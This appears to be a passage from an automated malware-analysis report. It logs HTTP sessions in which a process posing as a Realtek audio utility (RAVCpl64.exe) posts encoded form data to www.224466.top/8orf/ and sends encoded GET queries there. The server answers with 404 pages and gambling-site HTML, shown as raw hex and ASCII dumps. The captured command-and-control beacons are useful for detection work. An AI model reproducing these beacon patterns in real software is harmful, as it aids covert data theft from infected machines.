                                                                                                                                                                                                                                Data Ascii: 3ed8}iwE?c3nH$~}DV)-Q(JD]<DJ$gxD_xY0zbG?}7~{('~#t`sb/o|6!}e::?kU^~>/yY*_CR0./+b;K^+s~`-~N-s.'H<0 5|=` CM@4[w0_1r8t(Wpz1U^+)^aE<<Ul_`z1S8tbH"](^J5-f^{%ZDRa13J`JD?L!KP Q8Qb]UQbZ|%lR4IWuX@}P{;2M_6n!edhJ^A+ClU*J9Jp0A7u-kBp/c"L}ly=Aw[/42nq/6:569z?yaBYBrzw2|/WwY@=sU6bj1(WSb]Qid~M1d}~qa-x(|P1FB-VX]"R_~_KMi. xxv^j(XHrd}2|Mw=e*g_rpPJT)&Tq [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556817055 CET1289INData Raw: aa b3 49 e7 ac 2b 61 35 61 89 03 6d 42 9b eb 01 83 4c 49 57 3c 79 ee 60 fc 85 e8 07 b3 7e 6a a0 be ad 55 15 56 a3 99 9c 07 4c c5 cb 4b 1c 0b 7c 4a 60 15 b1 25 d9 f4 38 55 23 06 12 3d 1a 0d 26 1e 02 9e 51 21 cf 8c 20 b2 e0 20 d9 d2 45 4a cb 19 c8
                                                                                                                                                                                                                                Data Ascii: I+a5amBLIW<y`~jUVLK|J`%8U#=&Q! EJ}EGQPY.qlMQb_~F@+>hjS)18dvU->QX|ume%xt/8'aGsbBL"15Xr^KasK$_ZB)c0]*
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556864023 CET1289INData Raw: 10 a0 b8 77 ae af f4 38 31 ba da 1e 79 92 5e 29 5a 5a 5e 31 6a 92 38 0c 5d a3 51 55 94 26 6b e9 0a b1 2b bb f5 59 f7 fe 77 c1 3b 37 bb b7 3f 03 ad 9d b8 da 1e e8 b6 4f da f9 15 c3 74 0c 9f 33 b6 a6 17 93 f3 62 03 be 78 ce d2 ae 29 94 75 b9 6c b0
                                                                                                                                                                                                                                Data Ascii: w81y^)ZZ^1j8]QU&k+Yw;7?Ot3bx)ulFH]ZBJ.}Dxob_pea!syVJA%O]Y=6qxJJ{N%vkWD2#7>_~Wn]O<9c3
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557074070 CET1289INData Raw: 32 e3 19 3c 67 aa 84 fa 95 85 9c 6d 0e 90 d0 38 8f 47 a6 ac 64 79 c0 a4 95 d4 19 07 48 c8 9c a4 b3 f9 96 de df 69 8d 10 f9 09 61 a4 29 9a d2 6a 9a 88 9e 6a c9 36 44 59 29 9a 4d c1 9a de dc d6 74 e4 bc 28 14 5a b3 0f 90 68 80 2d 12 a9 7a d3 9c f5
                                                                                                                                                                                                                                Data Ascii: 2<gm8GdyHia)jj6DY)Mt(Zh-z-lDK[3nW%w 22n$<^LLt:Lwh#?[/~Q{vsQC5m\Vgnb8HUUSL;!@0aNZM$
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557132959 CET1289INData Raw: 36 2c af b1 0f 17 b9 61 15 e8 25 25 dc 12 6f 29 ac 9a 17 8a 82 03 a1 2b d1 5b c9 0a 17 24 bb 24 de a3 6c dd 37 45 38 26 ea bd e7 e9 8a 40 6e 4c 06 d5 37 5e 84 12 26 83 8c e2 71 1d 12 5b e1 fd aa 8b 16 98 22 23 0a 02 27 20 8a ce 0b f3 aa 8d f7 85
                                                                                                                                                                                                                                Data Ascii: 6,a%%o)+[$$l7E8&@nL7^&q["#' a9%z>$u){,rE(2%T=&}6TAdbB5(1p,MIMb/]/.JR|x6lDq[([r#%GFjVNDB-dC$~gDNb(bRgY
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557178974 CET1289INData Raw: c9 9e e1 81 c3 d7 10 d7 8e 7a 1f df df 6f f7 c1 71 34 cf 81 92 87 2e 14 1b 6b 3f 38 1e 9c 7b 16 89 7e 10 df e1 12 77 22 58 be 03 02 2f b8 82 b5 88 48 34 82 50 86 ec 25 b0 54 b6 4f bd 07 22 76 ff 82 7d 70 a3 be c8 df 60 a4 63 56 6a 81 27 75 d8 e6
                                                                                                                                                                                                                                Data Ascii: zoq4.k?8{~w"X/H4P%TO"v}p`cVj'u^|SWQhdT<`*3=e6xh/)HpBa/=%47zh?)_w?<C9"!zZ8;4Y*Vj^]0+ouuoY=GFJG;|o
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557219982 CET1289INData Raw: 55 ec d8 96 5d 63 21 ef 25 e1 d2 93 3b 90 33 51 3d f7 bb d0 23 64 f7 ae f9 e8 b8 3e 37 9f 76 ca d9 b5 37 f7 87 3e c6 06 8e 23 2f e6 76 f5 1e 1d dc dc b5 37 e3 c9 57 75 28 2c ce 72 3a 7a 31 87 d9 35 7a e4 8d 3d 2f bd 00 ae 11 04 7c 89 99 56 37 4a
                                                                                                                                                                                                                                Data Ascii: U]c!%;3Q=#d>7v7>#/v7Wu(,r:z15z=/|V7J7 |GDz%g%RJfr.%$X6Z ;dFoKg1&hR^KZ:TXp,aFS51B&'9.X&B Zu`WGj}YdJP00I$)#~z
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557265997 CET1289INData Raw: 07 cf d1 8c 76 f9 66 1e 6c 35 92 84 e3 82 37 69 97 63 0b 45 54 20 80 5d 7b 7c 2a 38 f1 55 46 a3 2d e4 7a b6 c7 1a b8 ce de 26 8d 96 10 12 a9 32 49 b4 cb 4f 83 9b 47 82 f7 ae af 1f 7d 27 6e ba b7 fd 20 3f 07 95 89 92 77 33 f7 45 09 19 e8 bb aa 57
                                                                                                                                                                                                                                Data Ascii: vfl57icET ]{|*8UF-z&2IOG}'n ?w3EWk`gO+{"yJLie7`Ss;cA=w8~pf[G>Ew "cH3mNqG3VXSO?nvo<?q>V+@a
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557308912 CET1289INData Raw: bf d8 fe f0 6a 64 31 c1 bf de 79 08 db 73 88 66 82 5c 17 c1 b1 a3 9d ab 37 70 dc 40 1c 9f 31 a4 f7 a7 d9 6b 48 51 74 20 97 87 e1 34 4d 2e 17 a3 38 32 f9 c5 47 f4 90 ba e7 77 a1 1f cf be 11 35 32 12 ec ea b8 76 de a0 4d 53 cf f5 df 7b 15 36 b1 63
                                                                                                                                                                                                                                Data Ascii: jd1ysf\7p@1kHQt 4M.82Gw52vMS{6cdKIdR@@`HQz$2L'eQJ*,&i]=Wl0'<-Hn+yYR/eB2b*NL2=`eFFW3l`q4\Flc'3$e
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557357073 CET1289INData Raw: 21 35 c2 34 5a 13 5b 34 59 b6 68 37 b7 4d bc 14 92 e2 25 f8 ea 70 fb d3 2f 83 fb d7 d6 2f 7c bd f6 e4 61 e7 9b 1f d7 cf 7e d1 bd fc a8 7d ff ad f5 0b df fc f5 c9 f1 ff 7b f4 e1 fa 85 4f 82 0f 3e e8 2c 7f bb 53 a4 cb 84 40 3f 77 e1 22 53 8c 59 71
                                                                                                                                                                                                                                Data Ascii: !54Z[4Yh7M%p//|a~}{O>,S@?w"SYq].m%M)7pvZiQs-+JTS%-:b @$*ST;8dT}hGFd7!O(?gspX>=|oj|vprH`B
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871862888 CET1289INData Raw: 09 86 b2 92 15 0e 92 4c 95 45 06 92 67 4a 0a 64 c7 ef 3e bb bc 7e fc 4c 58 b5 fe d9 fa 87 97 70 54 f6 f5 af 3a 5f ad e0 5c 69 ab ab 6b 4f 3e ed 3c bb db 79 76 69 a8 c5 21 f1 92 c0 0e af 4a 2d 17 71 90 8d 3a c4 0e e7 9b 59 29 bc 36 c0 50 3f 23 ff
                                                                                                                                                                                                                                Data Ascii: LEgJd>~LXpT:_\ikO><yvi!J-q:Y)6P?#J^_S3}[9C|w}JW>rRjWZXUS1:p*B)CtvSt\jGuNWJ"9J4k\f]CZJZ*[UH;\'


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                55192.168.11.204981445.197.47.177807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080641031 CET1289OUTPOST /8orf/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.224466.top
                                                                                                                                                                                                                                Referer: http://www.224466.top/8orf/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 42 34 63 2b 32 54 70 61 43 42 62 44 33 55 67 34 4c 79 75 37 52 49 59 39 5a 33 53 73 48 57 63 4d 6d 59 41 54 51 51 71 75 48 45 76 61 41 6c 31 64 77 61 71 77 76 2f 6e 76 66 4d 35 44 45 4e 48 71 4e 35 77 78 6c 2b 38 44 6f 61 5a 4a 78 43 50 62 50 56 35 61 75 78 4e 59 36 72 41 4b 53 63 54 2b 6a 6a 7a 31 75 45 4c 2f 35 70 4f 50 35 45 66 43 6d 36 79 46 72 31 50 72 68 62 62 6f 4b 2b 4f 66 6c 57 59 6c 46 78 31 65 43 33 79 35 31 6c 74 70 71 6e 35 70 72 77 50 42 58 31 57 59 36 30 48 74 58 38 4d 47 34 48 34 76 4c 61 75 77 36 33 34 33 43 4d 49 55 2b 48 74 64 72 49 51 53 41 69 65 68 5a 55 61 45 6a 62 73 7a 32 4a 6d 59 2b 62 46 67 6a 4d 6b 6f 78 77 69 79 47 52 7a 4d 78 41 52 70 6a 56 6c 4f 49 2b 72 56 57 79 5a 5a 42 34 5a 6e 4d 48 49 4a 65 31 31 72 78 42 38 66 59 6b 56 78 72 63 31 49 61 61 72 71 65 35 65 77 56 4a 74 4a 37 6d 6f 67 32 2f 48 77 4e 32 6f 67 6a 51 55 30 2f 47 70 74 6b 4f 4d 4b 69 41 36 66 6b 30 63 49 43 79 66 50 4e 53 6e 4c 75 47 35 77 4b 6d 4a 59 38 55 4c 30 70 6d 51 6b 67 30 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=/B4c+2TpaCBbD3Ug4Lyu7RIY9Z3SsHWcMmYATQQquHEvaAl1dwaqwv/nvfM5DENHqN5wxl+8DoaZJxCPbPV5auxNY6rAKScT+jjz1uEL/5pOP5EfCm6yFr1PrhbboK+OflWYlFx1eC3y51ltpqn5prwPBX1WY60HtX8MG4H4vLauw6343CMIU+HtdrIQSAiehZUaEjbsz2JmY+bFgjMkoxwiyGRzMxARpjVlOI+rVWyZZB4ZnMHIJe11rxB8fYkVxrc1Iaarqe5ewVJtJ7mog2/HwN2ogjQU0/GptkOMKiA6fk0cICyfPNSnLuG5wKmJY8UL0pmQkg0BqOSjixEiDZbg2zNu46pH+e2vTZjsdYY8a15qpQD11DZ0X3h+vR4my0hqkGV5SGuLGdnUwslztFFLpe0WKghFq9J4J82z/+Mhq/lhY+a6rpvpYyfc+XFHGI0ZdwgwfGl990mxup1rfjlmlYU+NTOIvgiZ7IcqYjVxHX/inT/C8WGz03GUzU8LCnVn/QIHlE9ItkFakkerHwiPKVunM2wgJpR0w3Fmm9H0oFBwGkcFJ5pBAqjSNPk2vvSB+CTk1kVFz+nKXLijbXOcOo0YzmsYQcn57vAaHORkOuCwRQ3bNz3ERzgjus87iJQiGtBaUrfrTEsK8FAnC3rR/k1AWDp86xqmvjv6WR3cEStJ9Gd1Mma8Ol7e+wNDNUmHoum2N5lH6qiqazKdk8rEEchhLA1ItyHdkKLHN3b3rMGKoufNneDmHGdhCm8/YTmjaEb6LLmLhKeSRDGiWkWEOqOV3c8pDJwdbAT3aF
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080698967 CET6445OUTData Raw: 79 72 2f 7a 30 42 48 52 47 6c 69 46 43 41 57 37 49 77 36 63 58 63 74 55 32 36 49 2f 6c 2b 43 76 31 76 6a 64 62 77 4d 38 70 56 77 37 68 78 79 46 50 48 55 38 6a 52 51 2f 50 72 69 54 59 76 30 2b 46 2f 6b 77 2b 75 76 67 42 62 71 56 33 48 57 39 72 37
                                                                                                                                                                                                                                Data Ascii: yr/z0BHRGliFCAW7Iw6cXctU26I/l+Cv1vjdbwM8pVw7hxyFPHU8jRQ/PriTYv0+F/kw+uvgBbqV3HW9r7uD9UvAX5Hf5wSPi24MyA4TfQMu+newovjkgMjwYfvS14bBQXtVhKOMVaw9mWycjr6Z9L/VDvuxjCWPBHgs4pzZezyk06Th+guAJ7JOVexgrsX29ZLKhSlP8/F+kHrDfidaSuUxVDtOCwXCc4i7AKG8VMAgRcbJip3
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080746889 CET109OUTData Raw: 30 4b 36 2b 6b 43 71 38 57 42 4b 76 6e 45 63 64 37 49 75 2b 36 2b 41 55 47 66 79 48 65 59 70 71 44 50 77 72 31 5a 46 76 59 50 77 39 58 43 4b 2f 79 78 34 71 58 55 37 70 46 70 66 4b 42 31 50 65 49 31 6c 50 71 59 46 41 61 58 2b 41 4d 2b 66 2b 59 61
                                                                                                                                                                                                                                Data Ascii: 0K6+kCq8WBKvnEcd7Iu+6+AUGfyHeYpqDPwr1ZFvYPw9XCK/yx4qXU7pFpfKB1PeI1lPqYFAaX+AM+f+YavwZo+rkx1Uhx2QRIdxh+hAvvg==
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395240068 CET536INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:00 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                ETag: W/"6735d5d4-11e4a"
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 33 65 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 1b c7 91 e8 77 45 f8 3f c0 63 ef 92 0c 93 33 83 6e a0 01 48 24 f7 e9 a0 bc 7e e1 7d f6 ae bd bb b1 f1 e2 c5 44 1f d5 f7 dd 8d d3 56 04 29 89 f7 2d 51 07 c5 91 28 4a a4 44 5d 3c 44 4a 24 67 78 44 f8 a7 d8 d3 00 e6 cb f3 5f 78 59 dd 0d a0 ba d1 98 01 30 03 7a fc 62 47 0a 02 dd e8 ae ca ca cc ca ca ca ca e3 85 fd 3f 7d ed 37 af fe fe bf 7e 7b 28 27 fb 86 7e f0 85 fd f8 23 a7 b3 a6 74 60 0e 99 73 f8 06 62 85 83 2f e4 e0 6f bf 81 7c 36 c7 cb ac eb 21 ff c0 dc bf ff fe f5 7d 65 fc 84 af f8 3a 3a f8 b2 f4 8f 3f 6b 14 0e 55 5e 7e 09 3e 8b 2f d3 79 fc 59 2a e5 5f c7 9f 85 43 af bc fc d2 9f 1e ec 0e bf 52 af 85 8f 30 af bf f6 d2 1e fc 85 2e 84 cf 16 0f 95 0a e1 b3 af 1f 0a af cb 2f 97 2b e1 e7 e2 62 f4 3b fd fa e2 4b fb 17 a2 de 5e d8 af 2b a6 96 73 91 7e 60 ce 93 2d d7 e7 ab 7e 4e e1 2d 73 2e 27 bb 48 3c 30 b7 20 b2 35 7c 3d 0f ff 60 20 43 d8 4d d6 40 07 e6 34 d4 ac 5b ae e0
                                                                                                                                                                                                                                Data Ascii: 3ed8}iwE?c3nH$~}DV)-Q(JD]<DJ$gxD_xY0zbG?}7~{('~#t`sb/o|6!}e::?kU^~>/yY*_CR0./+b;K^+s~`-~N-s.'H<0 5|=` CM@4[
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395479918 CET536INData Raw: cd e5 e0 77 1f 99 30 16 16 03 9f 00 16 ae 99 d7 5f a1 31 00 95 e2 a1 72 38 18 a6 74 28 04 f4 95 57 18 f2 b3 70 a8 b8 18 fe fe 7a 31 1a f4 cb af 55 5e da 9b 89 8f e2 2b 95 a8 29 fc e8 de cc 5e 01 0d 61 af 45 3c dc b0 b7 e8 15 06 be bc 94 1a 89 80
                                                                                                                                                                                                                                Data Ascii: w0_1r8t(Wpz1U^+)^aE<<Ul_`z1S8tbH"](^J5-f^{%ZDRa13J`JD?L!KP Q8Qb]UQbZ|%lR4IWuX@}P
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395488977 CET536INData Raw: c7 cf 86 fd b3 b1 04 97 7d df 7e 71 61 81 a2 0a 05 86 99 f7 2d 9b 78 28 7c 50 31 a4 1c 46 c2 dc 42 d5 d6 2d 56 f0 16 58 5d 87 9b 0b d4 22 cc 82 52 be bc 90 df 07 5f 7e f9 af 8b c5 5f fd 4b 91 9e b7 4d 69 2e c7 ea 20 ee c9 ee 16 d8 78 dc 0b 80 9d
                                                                                                                                                                                                                                Data Ascii: }~qa-x(|P1FB-VX]"R_~_KMi. xxv^j(XHrd}2|Mw=e*g_rpPJT)&Tq-%a4rRy`nw'qXkN#aDdwn6+I+a5amBLIW<y`
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395495892 CET536INData Raw: 29 86 50 29 e9 51 47 30 eb fc b4 6c ce 6a 23 c2 cd 80 eb d5 86 e4 5a 8e e0 92 32 7a d4 7b 1b dd 87 a9 07 fb 8b 51 4f 10 13 33 eb 91 c4 c0 cc ba dd 30 ca b6 cf f5 c9 ed 2a 92 bc 19 7c 83 e5 22 5e 04 b2 d8 7b 23 8e 1b 8d fa 11 c0 67 dc 1e 7f 46 23
                                                                                                                                                                                                                                Data Ascii: )P)QG0lj#Z2z{QO30*|"^{#gF#!XGyIc$fW8wIpU&%GMjz>~3@P'$w}Kk}L28]jSF)37U}j5d4uBiz RG8)
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395515919 CET536INData Raw: 0c 10 ab 19 cb 70 9a 8a ba e6 c1 be 4e 43 04 15 db ef df 59 ff 60 b5 fb c3 db dd 5b b7 e7 0e 92 57 9b 6b 02 2d d3 74 59 53 16 9c 49 74 f9 a2 ee d4 c0 96 83 b4 a9 34 01 97 71 7c ae 58 33 e4 a9 35 01 a4 95 d4 9a 6d 30 52 ac 09 24 87 3c b1 26 40 a2
                                                                                                                                                                                                                                Data Ascii: pNCY`[Wk-tYSIt4q|X35m0R$<&@1H2YkVP[D5Kq~KhNvz>$OXwx,AZ{o`%G`I8AIC5l8i&pXpY:j6}*hgYulQo+k,&f*Ft
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395522118 CET536INData Raw: e0 cc fb 7d bb 44 78 b5 b9 b4 83 d3 02 8e 6f 98 62 5f 70 65 80 10 f1 18 61 21 73 c1 d3 00 e9 79 56 9d 4a da 15 41 be 0a 25 4f ef ab e2 13 db b8 5d 59 85 8d 3d 0f d2 36 b2 71 c7 a6 98 78 c8 93 4a bb 04 4a 7b d2 4e ca 97 25 dd a4 cc e2 ac a5 1d 9c
                                                                                                                                                                                                                                Data Ascii: }Dxob_pea!syVJA%O]Y=6qxJJ{N%vkWD2#7>_~Wn]O<9c3W#OC>ljlC"]dCn}I0SnF2p`rVeBwBq`x5J_eR
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395529032 CET536INData Raw: 3b ab 57 41 2d 4d de d8 1e 18 b7 4f 22 eb c8 71 44 96 33 b7 b8 bf 48 0a af 91 bc fb 9c 25 b2 c0 d2 25 b9 4e 09 5c c6 74 4a ad ab 9c ee d4 05 0d 89 66 83 b4 a6 ac 04 a7 ae 00 6f b5 57 2e e0 3d ec e0 6a 73 89 2c f9 ac 60 0a b6 d3 df 2a 64 80 30 b4
                                                                                                                                                                                                                                Data Ascii: ;WA-MO"qD3H%%N\tJfoW.=js,`*d0{@TS/`dqG(-'<DN'irfWq'u$WO#iI_t!Nl<_YW#OY3I<5uwsZg>}J=6y5+uU
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395534992 CET536INData Raw: a3 de d4 aa 66 75 ac 00 09 49 72 6a be e8 35 ad a1 00 89 82 88 04 88 18 a8 35 b7 21 40 c2 e7 0d 1e 49 4d 89 34 81 0d c7 93 6c 10 20 51 b6 24 4d ae 6b be 3b 45 80 04 1c 0d 18 15 97 f5 48 0d 23 ab f3 ed 08 90 f0 90 5a e7 68 0f c1 21 68 76 80 84 59
                                                                                                                                                                                                                                Data Ascii: fuIrj55!@IM4l Q$Mk;EH#Zh!hvY2G$8[Vu @G/L\T@2<gm8GdyHia)jj6DY)Mt(Zh-z-lDK[3nW%w 22
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395539999 CET536INData Raw: b1 8a e8 21 59 bc 13 02 24 0a f5 12 5f 41 92 01 13 27 bd 52 ec 80 00 09 4f b2 1d ad 59 a3 21 a7 41 0a ba 9d 10 20 81 f2 c8 66 05 b7 30 ac a7 fc 7d 07 48 98 55 9f ab 54 74 08 72 de 92 d9 77 67 06 48 70 9c 51 72 cc 96 36 c6 4a b1 dd 01 12 10 ce ad
                                                                                                                                                                                                                                Data Ascii: !Y$_A'ROY!A f0}HUTtrwgHpQr6J?!iVdBk68Ym#jFSQg G#3jEDymmS5&IVpKN MV(|;@BV9AT\;3@zYE(izu*


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                56192.168.11.204981545.197.47.177807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.925647974 CET417OUTGET /8orf/?pluxVm=yDQ89DLfYgJiEyke7+6q5gE87/fs/XemaXtjJXohmXUOdwNzAwGJy6nqls5iDTVnp9Zi+kacGLaYAX6Ad+cHYYESeoueNmRKrwXa18136rVeVa07ORWAOLw=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.224466.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241132975 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:55:03 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 73290
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                ETag: "6735d5d4-11e4a"
                                                                                                                                                                                                                                Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 41 67 26 23 78 34 45 39 41 3b 26 23 78 35 41 33 31 3b 26 23 78 37 37 31 46 3b 26 23 78 34 45 42 41 3b c2 b7 28 26 23 78 34 45 32 44 3b 26 23 78 35 36 46 44 3b 29 26 23 78 35 33 34 31 3b 26 23 78 35 45 37 34 3b 26 23 78 34 46 45 31 3b 26 23 78 38 41 38 39 3b 26 23 78 38 30 30 31 3b 26 23 78 35 33 46 30 3b 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 26 23 78 37 37 31 46 3b 26 23 78 34 45 42 41 3b 26 23 78 36 46 42 33 3b 26 23 78 39 35 45 38 3b 26 23 78 37 36 37 45 3b 26 23 78 35 42 42 36 3b 26 23 78 35 42 42 36 3b 26 23 78 34 45 35 30 3b 26 23 78 37 46 35 31 3b [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"><title>Ag&#x4E9A;&#x5A31;&#x771F;&#x4EBA;(&#x4E2D;&#x56FD;)&#x5341;&#x5E74;&#x4FE1;&#x8A89;&#x8001;&#x53F0;</title><link rel="shortcut icon" href="/favicon.ico"><meta name="keywords" content="ag&#x771F;&#x4EBA;&#x6FB3;&#x95E8;&#x767E;&#x5BB6;&#x5BB6;&#x4E50;&#x7F51;&#x7AD9;,Ag&#x4E9A;&#x5A31;&#x5B98;&#x7F51;,ag&#x771F;&#x4EBA;&#x5E73;&#x53F0;&#x5B98;&#x65B9;"><meta name="description" content="ag&#x771F;&#x4EBA;&#x6FB3;&#x95E8;&#x767E;&#x5BB6;&#x5BB6;&#x4E50;&#x7F51;&#x7AD9;&#x3010;&#x4EE5;&#x5C0F;&#x535A;&#x5927;&#x3011;,ag&#x771F;&#x4EBA;&#x6FB3;&#x95E8;&#x767E;&#x5BB6;&#x5BB6;&#x4E50;&#x7F51;&#x7AD9;&#x6DB5;&#x76D6;&#x8DB3;&#x7403;&#x3001;&#x771F;&#x4EBA;&#x89C6;&#x8BAF;&#x3001;&#x7535;&#x5B50;&#x6E38;&#x827A;&#x3001;&#x5B98;&#x65B9;&#x76F4;&#x8425;,Ag&#x4E9A;&#x5A31;&#x5B98;&#x7F51;&#x662F;&#x6700;&#x9AD8;&#x901F;&#x7684;&#x4E0B;&#x8F7D;&#x548C;&#x7545;&#x5FEB;&#x7684;&#x6E38;&#x620F;,&#x6240;&#x4EE5;ag&#x771F;&#x4EBA;&#x5 [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241188049 CET1289INData Raw: 23 78 39 39 39 36 3b 26 23 78 38 39 38 31 3b 26 23 78 37 36 38 34 3b 26 23 78 37 36 45 45 3b 26 23 78 36 38 30 37 3b 26 23 78 33 30 30 32 3b 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 61
                                                                                                                                                                                                                                Data Ascii: #x9996;&#x8981;&#x7684;&#x76EE;&#x6807;&#x3002;"><link rel="stylesheet" href="static/css/normalize.css"><link href="static/css/font-awesome.css" rel="stylesheet"><link rel="stylesheet" href="static/css/common.css"><link rel="stylesheet" hr
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241234064 CET1289INData Raw: 37 62 61 37 78 78 6f 69 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 32 34 34 36 36 2e 74 6f 70 22 20 74 69 74 6c 65 3d 22 e7 bd 91 e7 ab 99 e9 a6 96 e9 a1 b5 22 3e e7 bd 91 e7 ab 99 e9 a6 96 e9 a1 b5 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a
                                                                                                                                                                                                                                Data Ascii: 7ba7xxoi"><a href="http://224466.top" title=""></a> </li> <li class="ejvsjq9eb5"> <a href="/html/ufevxzpmdb/" title="ag">ag</a>
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241367102 CET1289INData Raw: 5f 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6d 6e 73 73 62 6c 67 79 64 20 73 75 62 6d 65 6e 75 5f 6c 65 66 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                Data Ascii: _wrap"> <div class="emnssblgyd submenu_left"> <div class="exyyfc9pco name"></div> <a href="/html/hsuobcmenc/" class="ejtguoxhfm menu_more">read more +<
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241431952 CET1289INData Raw: 22 2f 68 74 6d 6c 2f 76 6b 6d 69 6e 74 67 6a 74 62 2f 22 20 74 69 74 6c 65 3d 22 e8 8d a3 e8 aa 89 e9 a3 8e e9 87 87 22 3e e8 8d a3 e8 aa 89 e9 a3 8e e9 87 87 3c 2f 61 3e 3c 2f 64 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                Data Ascii: "/html/vkmintgjtb/" title=""></a></dd> <dd class="eknas8pjbs"><a href="/html/hdgjgdspdo/" title=""></a></dd>
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241508007 CET1289INData Raw: e9 80 9a e7 9f a5 e5 85 ac e5 91 8a 22 3e e9 80 9a e7 9f a5 e5 85 ac e5 91 8a 3c 2f 61 3e 3c 2f 64 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                Data Ascii: "></a></dd> <dd class="ebdds5fkkg"><a href="/html/yehmqvunmf/" title=""></a></dd>
